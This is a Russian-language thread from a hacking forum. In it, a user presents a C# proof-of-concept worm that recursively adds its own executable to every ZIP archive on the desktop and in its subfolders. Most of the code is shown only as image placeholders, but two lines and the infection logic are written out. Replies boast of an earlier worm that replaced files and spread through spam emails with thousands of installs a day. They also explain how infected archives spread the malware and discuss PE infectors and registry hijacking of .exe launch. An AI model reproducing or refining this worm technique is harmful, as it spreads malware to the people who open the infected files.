• XSS.stack #1 – первый литературный журнал от юзеров форума

Заражаем ZIP архивы [C#, PoC]

V1rtualGh0st

(L3) cache
Пользователь
Реакции
485
Гарант сделки
19
Депозит
0.00
Привет, скрипт-кидди брат. Сегодня я покажу тебе Proof-Of-Concept мини-червя, который добавляет себя во все .zip архивы.

Начнём.

Логика нашего червя:

• Ищем все zip файлы в папке
  • Добавляем своё отродье в архив
  • Повторяем тоже самое со всеми файлами. (рекурсией)
Первым делом создадим новый метод, который будет принимать 2 аргумента - папку для заражения и файл, который будем добавлять в архив:

ed4591580d8fbc7ef2dd9.png

И создаём рекурсивный метод, который будет заражать все подпапки:
8412ad68a090b9e685dc3.png

C#:
    string currentFilePath = Assembly.GetExecutingAssembly().Location,
                      desktopPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop);

Затем вызываем методы:

C#:
    zipInfect(new DirectoryInfo(desktopPath), currentFilePath); // Заражаем архивы на рабочем столе
               recursiveInfect(desktopPath, currentFilePath); // И в подпапках

f0acbc74c5d6da8a20186.png

И теперь тестим:

e87cae03fc7dde7a3061a.png

0994be464677b9454f816.png

Как видим, в архивах появился наш файлик.

Источник.

Пожалуйста, обратите внимание, что пользователь заблокирован
Помню был червь в 15 году.
Сканировал все диски на наличие exe\txt\zip файлов.
После сканирования - создавал за место файла свой exe и удалял оригинал (перед этим взяв свойства оригинала. Иконка, название)
+ заражал все новые диски и сам себя распространял по почте (при отправке любой ссылки\файла отправлялся именно нужный нам файл)
Не помню уже его названия и не знаю на сколько он актуален на данный момент, но в те года мне удавалось делать по 5к инсталлов в день, уделив неделю на распространение ручками, через спам. (число инсталлов росло как снежный ком)
Может из олдов помнит кто название данного червя?

Какой вред нанесет к примеру мне?
Будут битые архивы у меня, или всё zip файлы можно будет слить?
В хаке подобном не силен, многое в этом формате пакую

Какой вред нанесет к примеру мне?
Будут битые архивы у меня, или всё zip файлы можно будет слить?
В хаке подобном не силен, многое в этом формате пакую
Написано в описании ведь, друг, что добавляет просто твой файл во все найденные zip
  • Ищем все zip файлы в папке
  • Добавляем своё отродье в архив

Практическое применение данного способа остается в тайне.
А что тайного то?
Человек просто мб кому-то отправит зип архив в котором по его мнению будет отчет/лаба/нужный файл . а туда дропнется еще и экзешник, а потом хомяк какой-нибудь скачавший его архив , случайно или из любопытства откроет тот файл который дропнулся, вот тебе мини баф к spread зверька,как-то так) ну и + у тебя сорцы выше, можешь импровизировать и что-то еще сделать в плане spread'а

Интересный способ. Есть ещё способ заражения, что любые файлы при открытии запускают экзешник. Было бы интересно ещё и дописать свой экзешник в другие программы, чтобы при их запуске незаметно стартовал и свой файл. Тогда не нужно будет заботиться об автозагрузке. Знаю, что так можно, но не нашел реализации.

Интересный способ. Есть ещё способ заражения, что любые файлы при открытии запускают экзешник. Было бы интересно ещё и дописать свой экзешник в другие программы, чтобы при их запуске незаметно стартовал и свой файл. Тогда не нужно будет заботиться об автозагрузке. Знаю, что так можно, но не нашел реализации.
Ты изобрел pe infector.

Не изобрел. Сейчас уже все возможные способы давно изобретены. Интересно было бы найти исходник этого действа.
Есть возможность в реестре винды менять значения на запуск *.exe файлов, при том что и оригинальный файл будет нормально отрабатывать)

Есть возможность в реестре винды менять значения на запуск *.exe файлов, при том что и оригинальный файл будет нормально отрабатывать)
Да, видел такой вариант. Через ShellExecute, вроде бы, как-то можно, попадалась статья.

блет какой же бред инфектор этот, совершенно не боевой в 2020(для года так 2015 сойдет)
Так никто и не говорит, что инфектор ахуеный, выклал только ради ознакомления :(

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх